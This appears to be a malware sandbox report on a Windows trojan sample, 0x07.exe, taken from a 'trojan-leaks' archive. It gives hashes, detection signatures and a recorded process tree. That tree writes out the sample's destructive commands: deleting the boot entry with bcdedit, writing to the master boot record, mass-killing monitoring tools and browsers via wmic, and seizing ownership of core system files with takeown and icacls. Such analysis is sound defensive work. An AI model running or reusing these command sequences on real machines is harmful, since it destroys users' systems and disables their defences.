Overview
overview
10Static
static
7trojan-lea...35.exe
windows7-x64
8trojan-lea...35.exe
windows10-2004-x64
8trojan-lea...07.exe
windows7-x64
8trojan-lea...07.exe
windows10-2004-x64
8trojan-lea...NT.rar
windows7-x64
3trojan-lea...NT.rar
windows10-2004-x64
3trojan-lea...1).zip
windows7-x64
1trojan-lea...1).zip
windows10-2004-x64
1trojan-lea...ys.exe
windows7-x64
7trojan-lea...ys.exe
windows10-2004-x64
7trojan-lea...0S.z01
windows7-x64
3trojan-lea...0S.z01
windows10-2004-x64
3trojan-lea...0S.z02
windows7-x64
3trojan-lea...0S.z02
windows10-2004-x64
3trojan-lea...0S.z03
windows7-x64
3trojan-lea...0S.z03
windows10-2004-x64
3trojan-lea...0S.zip
windows7-x64
1trojan-lea...0S.zip
windows10-2004-x64
1trojan-lea...er.exe
windows7-x64
3trojan-lea...er.exe
windows10-2004-x64
8trojan-lea...re.zip
windows7-x64
1trojan-lea...re.zip
windows10-2004-x64
1trojan-lea...32.exe
windows7-x64
10trojan-lea...32.exe
windows10-2004-x64
trojan-lea...32.exe
windows7-x64
trojan-lea...32.exe
windows10-2004-x64
trojan-lea...64.exe
windows7-x64
trojan-lea...64.exe
windows10-2004-x64
trojan-lea...ne.exe
windows7-x64
1trojan-lea...ne.exe
windows10-2004-x64
1trojan-lea...64.exe
windows7-x64
1trojan-lea...64.exe
windows10-2004-x64
1Resubmissions
09-05-2023 19:22
230509-x3fn4adg58 1009-05-2023 19:14
230509-xxsrgaff7x 1009-05-2023 19:14
230509-xxr5yadg42 709-05-2023 19:14
230509-xxrt6sff7w 809-05-2023 19:14
230509-xxrjeaff7v 809-05-2023 19:14
230509-xxqxwadg39 709-05-2023 19:14
230509-xxql4sff7t 1009-05-2023 19:14
230509-xxqbcadg38 709-05-2023 19:10
230509-xvl6xadf64 10Analysis
-
max time kernel
99s -
max time network
36s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
09-05-2023 19:22
Behavioral task
behavioral1
Sample
trojan-leaks-main/0.950095298700035.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
trojan-leaks-main/0.950095298700035.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
trojan-leaks-main/0x07.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
trojan-leaks-main/0x07.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
trojan-leaks-main/AIDS_NT.rar
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
trojan-leaks-main/AIDS_NT.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
trojan-leaks-main/Abantes (1).zip
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
trojan-leaks-main/Abantes (1).zip
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
trojan-leaks-main/AjarSys.exe
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
trojan-leaks-main/AjarSys.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
trojan-leaks-main/AnCo250S.z01
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
trojan-leaks-main/AnCo250S.z01
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
trojan-leaks-main/AnCo250S.z02
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
trojan-leaks-main/AnCo250S.z02
Resource
win10v2004-20230220-en
Behavioral task
behavioral15
Sample
trojan-leaks-main/AnCo250S.z03
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
trojan-leaks-main/AnCo250S.z03
Resource
win10v2004-20230220-en
Behavioral task
behavioral17
Sample
trojan-leaks-main/AnCo250S.zip
Resource
win7-20230220-en
Behavioral task
behavioral18
Sample
trojan-leaks-main/AnCo250S.zip
Resource
win10v2004-20230220-en
Behavioral task
behavioral19
Sample
trojan-leaks-main/Antivirus_Installer.exe
Resource
win7-20230220-en
Behavioral task
behavioral20
Sample
trojan-leaks-main/Antivirus_Installer.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral21
Sample
trojan-leaks-main/Aramaware.zip
Resource
win7-20230220-en
Behavioral task
behavioral22
Sample
trojan-leaks-main/Aramaware.zip
Resource
win10v2004-20230220-en
Behavioral task
behavioral23
Sample
trojan-leaks-main/BUG32.exe
Resource
win7-20230220-en
Behavioral task
behavioral24
Sample
trojan-leaks-main/BUG32.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral25
Sample
trojan-leaks-main/BaldiTrojan-x32.exe
Resource
win7-20230220-en
Behavioral task
behavioral26
Sample
trojan-leaks-main/BaldiTrojan-x32.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral27
Sample
trojan-leaks-main/BaldiTrojan-x64.exe
Resource
win7-20230220-en
Behavioral task
behavioral28
Sample
trojan-leaks-main/BaldiTrojan-x64.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral29
Sample
trojan-leaks-main/Benzene.exe
Resource
win7-20230220-en
Behavioral task
behavioral30
Sample
trojan-leaks-main/Benzene.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral31
Sample
trojan-leaks-main/Benzene_x64.exe
Resource
win7-20230220-en
Behavioral task
behavioral32
Sample
trojan-leaks-main/Benzene_x64.exe
Resource
win10v2004-20230220-en
General
-
Target
trojan-leaks-main/0x07.exe
-
Size
247KB
-
MD5
733eb0ab951ae42a8d8cca413201e428
-
SHA1
640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
-
SHA256
52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
-
SHA512
c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
-
SSDEEP
3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
-
Possible privilege escalation attempt 25 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exepid process 1608 icacls.exe 1476 takeown.exe 2012 icacls.exe 1708 icacls.exe 1748 icacls.exe 552 takeown.exe 1684 takeown.exe 876 takeown.exe 316 takeown.exe 1472 takeown.exe 1816 icacls.exe 1924 icacls.exe 1904 icacls.exe 520 takeown.exe 1596 takeown.exe 1440 takeown.exe 1220 icacls.exe 1352 takeown.exe 848 icacls.exe 1996 icacls.exe 1704 icacls.exe 964 icacls.exe 1100 takeown.exe 1216 takeown.exe 1956 takeown.exe -
Executes dropped EXE 2 IoCs
Processes:
winconfig.exeDetectKey.exepid process 1480 winconfig.exe 1416 DetectKey.exe -
Loads dropped DLL 1 IoCs
Processes:
0x07.exepid process 1992 0x07.exe -
Modifies file permissions 1 TTPs 25 IoCs
Processes:
takeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exepid process 1100 takeown.exe 1352 takeown.exe 1684 takeown.exe 1904 icacls.exe 1708 icacls.exe 520 takeown.exe 1476 takeown.exe 1216 takeown.exe 1748 icacls.exe 1924 icacls.exe 1996 icacls.exe 316 takeown.exe 552 takeown.exe 1472 takeown.exe 2012 icacls.exe 1816 icacls.exe 1608 icacls.exe 964 icacls.exe 1220 icacls.exe 1596 takeown.exe 1956 takeown.exe 876 takeown.exe 1440 takeown.exe 848 icacls.exe 1704 icacls.exe -
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1760 bcdedit.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
0x07.exedescription ioc process File opened for modification \??\PhysicalDrive0 0x07.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
DetectKey.exepid process 1416 DetectKey.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 636 WMIC.exe Token: SeSecurityPrivilege 636 WMIC.exe Token: SeTakeOwnershipPrivilege 636 WMIC.exe Token: SeLoadDriverPrivilege 636 WMIC.exe Token: SeSystemProfilePrivilege 636 WMIC.exe Token: SeSystemtimePrivilege 636 WMIC.exe Token: SeProfSingleProcessPrivilege 636 WMIC.exe Token: SeIncBasePriorityPrivilege 636 WMIC.exe Token: SeCreatePagefilePrivilege 636 WMIC.exe Token: SeBackupPrivilege 636 WMIC.exe Token: SeRestorePrivilege 636 WMIC.exe Token: SeShutdownPrivilege 636 WMIC.exe Token: SeDebugPrivilege 636 WMIC.exe Token: SeSystemEnvironmentPrivilege 636 WMIC.exe Token: SeRemoteShutdownPrivilege 636 WMIC.exe Token: SeUndockPrivilege 636 WMIC.exe Token: SeManageVolumePrivilege 636 WMIC.exe Token: 33 636 WMIC.exe Token: 34 636 WMIC.exe Token: 35 636 WMIC.exe Token: SeIncreaseQuotaPrivilege 636 WMIC.exe Token: SeSecurityPrivilege 636 WMIC.exe Token: SeTakeOwnershipPrivilege 636 WMIC.exe Token: SeLoadDriverPrivilege 636 WMIC.exe Token: SeSystemProfilePrivilege 636 WMIC.exe Token: SeSystemtimePrivilege 636 WMIC.exe Token: SeProfSingleProcessPrivilege 636 WMIC.exe Token: SeIncBasePriorityPrivilege 636 WMIC.exe Token: SeCreatePagefilePrivilege 636 WMIC.exe Token: SeBackupPrivilege 636 WMIC.exe Token: SeRestorePrivilege 636 WMIC.exe Token: SeShutdownPrivilege 636 WMIC.exe Token: SeDebugPrivilege 636 WMIC.exe Token: SeSystemEnvironmentPrivilege 636 WMIC.exe Token: SeRemoteShutdownPrivilege 636 WMIC.exe Token: SeUndockPrivilege 636 WMIC.exe Token: SeManageVolumePrivilege 636 WMIC.exe Token: 33 636 WMIC.exe Token: 34 636 WMIC.exe Token: 35 636 WMIC.exe Token: SeIncreaseQuotaPrivilege 1684 WMIC.exe Token: SeSecurityPrivilege 1684 WMIC.exe Token: SeTakeOwnershipPrivilege 1684 WMIC.exe Token: SeLoadDriverPrivilege 1684 WMIC.exe Token: SeSystemProfilePrivilege 1684 WMIC.exe Token: SeSystemtimePrivilege 1684 WMIC.exe Token: SeProfSingleProcessPrivilege 1684 WMIC.exe Token: SeIncBasePriorityPrivilege 1684 WMIC.exe Token: SeCreatePagefilePrivilege 1684 WMIC.exe Token: SeBackupPrivilege 1684 WMIC.exe Token: SeRestorePrivilege 1684 WMIC.exe Token: SeShutdownPrivilege 1684 WMIC.exe Token: SeDebugPrivilege 1684 WMIC.exe Token: SeSystemEnvironmentPrivilege 1684 WMIC.exe Token: SeRemoteShutdownPrivilege 1684 WMIC.exe Token: SeUndockPrivilege 1684 WMIC.exe Token: SeManageVolumePrivilege 1684 WMIC.exe Token: 33 1684 WMIC.exe Token: 34 1684 WMIC.exe Token: 35 1684 WMIC.exe Token: SeIncreaseQuotaPrivilege 1684 WMIC.exe Token: SeSecurityPrivilege 1684 WMIC.exe Token: SeTakeOwnershipPrivilege 1684 WMIC.exe Token: SeLoadDriverPrivilege 1684 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0x07.exewinconfig.execmd.exedescription pid process target process PID 1992 wrote to memory of 1480 1992 0x07.exe winconfig.exe PID 1992 wrote to memory of 1480 1992 0x07.exe winconfig.exe PID 1992 wrote to memory of 1480 1992 0x07.exe winconfig.exe PID 1992 wrote to memory of 1480 1992 0x07.exe winconfig.exe PID 1480 wrote to memory of 660 1480 winconfig.exe cmd.exe PID 1480 wrote to memory of 660 1480 winconfig.exe cmd.exe PID 1480 wrote to memory of 660 1480 winconfig.exe cmd.exe PID 1480 wrote to memory of 660 1480 winconfig.exe cmd.exe PID 660 wrote to memory of 1416 660 cmd.exe DetectKey.exe PID 660 wrote to memory of 1416 660 cmd.exe DetectKey.exe PID 660 wrote to memory of 1416 660 cmd.exe DetectKey.exe PID 660 wrote to memory of 1416 660 cmd.exe DetectKey.exe PID 660 wrote to memory of 1760 660 cmd.exe bcdedit.exe PID 660 wrote to memory of 1760 660 cmd.exe bcdedit.exe PID 660 wrote to memory of 1760 660 cmd.exe bcdedit.exe PID 660 wrote to memory of 636 660 cmd.exe WMIC.exe PID 660 wrote to memory of 636 660 cmd.exe WMIC.exe PID 660 wrote to memory of 636 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1684 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1684 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1684 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1500 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1500 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1500 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1020 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1020 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1020 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1152 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1152 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1152 660 cmd.exe WMIC.exe PID 660 wrote to memory of 820 660 cmd.exe WMIC.exe PID 660 wrote to memory of 820 660 cmd.exe WMIC.exe PID 660 wrote to memory of 820 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1460 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1460 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1460 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1464 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1464 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1464 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1816 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1816 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1816 660 cmd.exe WMIC.exe PID 660 wrote to memory of 588 660 cmd.exe WMIC.exe PID 660 wrote to memory of 588 660 cmd.exe WMIC.exe PID 660 wrote to memory of 588 660 cmd.exe WMIC.exe PID 660 wrote to memory of 2040 660 cmd.exe WMIC.exe PID 660 wrote to memory of 2040 660 cmd.exe WMIC.exe PID 660 wrote to memory of 2040 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1608 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1608 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1608 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1980 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1980 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1980 660 cmd.exe WMIC.exe PID 660 wrote to memory of 268 660 cmd.exe WMIC.exe PID 660 wrote to memory of 268 660 cmd.exe WMIC.exe PID 660 wrote to memory of 268 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1956 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1956 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1956 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1804 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1804 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1804 660 cmd.exe WMIC.exe PID 660 wrote to memory of 1636 660 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\0x07.exe"C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\0x07.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\Temp\winconfig.exe"C:\Windows\Temp\winconfig.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE79.tmp\AE7A.tmp\AE7B.bat C:\Windows\Temp\winconfig.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Users\Admin\AppData\Roaming\DetectKey.exe"C:\Users\Admin\AppData\Roaming\DetectKey.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1416
-
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current}4⤵
- Modifies boot configuration data using bcdedit
PID:1760
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='mmc.exe' delete /nointeractive4⤵PID:1500
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='PartAssist.exe' delete /nointeractive4⤵PID:1020
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='control.exe' delete /nointeractive4⤵PID:1152
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:820
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager.exe' delete /nointeractive4⤵PID:1460
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager Protable.exe' delete /nointeractive4⤵PID:1464
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='CCleaner.exe' delete /nointeractive4⤵PID:1816
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp.exe' delete /nointeractive4⤵PID:588
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64.exe' delete /nointeractive4⤵PID:2040
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64a.exe' delete /nointeractive4⤵PID:1608
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1980
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='regedit.exe' delete /nointeractive4⤵PID:268
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='iexplore.exe' delete /nointeractive4⤵PID:1956
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='chrome.exe' delete /nointeractive4⤵PID:1804
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='firefox.exe' delete /nointeractive4⤵PID:1636
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='opera.exe' delete /nointeractive4⤵PID:1440
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='edge.exe' delete /nointeractive4⤵PID:1572
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='msedge.exe' delete /nointeractive4⤵PID:1880
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='brave.exe' delete /nointeractive4⤵PID:1932
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='wmplayer.exe' delete /nointeractive4⤵PID:1160
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad.exe' delete /nointeractive4⤵PID:1632
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad++.exe' delete /nointeractive4⤵PID:1896
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1996
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:1044
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1584
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:1724
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskmgr.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:520
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\hal.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1596
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\winload.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1100
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\ntoskrnl.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1956
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\perfmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:316
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\resmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1352
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:552
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskkill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:876
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tasklist.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1684
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tskill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1472
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1476
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Process Hacker 2"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1440
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\drivers"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1216
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1784
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:908
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:612
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:284
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:848
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1748
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\winload.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2012
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1816
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1924
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1904
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1996
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1708
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1704
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:964
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1608
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1220
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1360
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:268
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:856
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:1352
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵PID:1920
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵PID:1476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1440
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵PID:1408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1068
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵PID:1456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1020
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵PID:528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1912
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:296
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵PID:1568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:432
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵PID:612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1564
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵PID:1764
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:284
-
-
C:\Windows\system32\cacls.execacls "C:\Program Files\Process Hacker 2" /grant "everyone":F4⤵PID:1632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2032
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\System32\drivers" /grant "everyone":F4⤵PID:1720
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a645734f3bf4a2682cbaf546789ec0c4
SHA1fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA2563b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b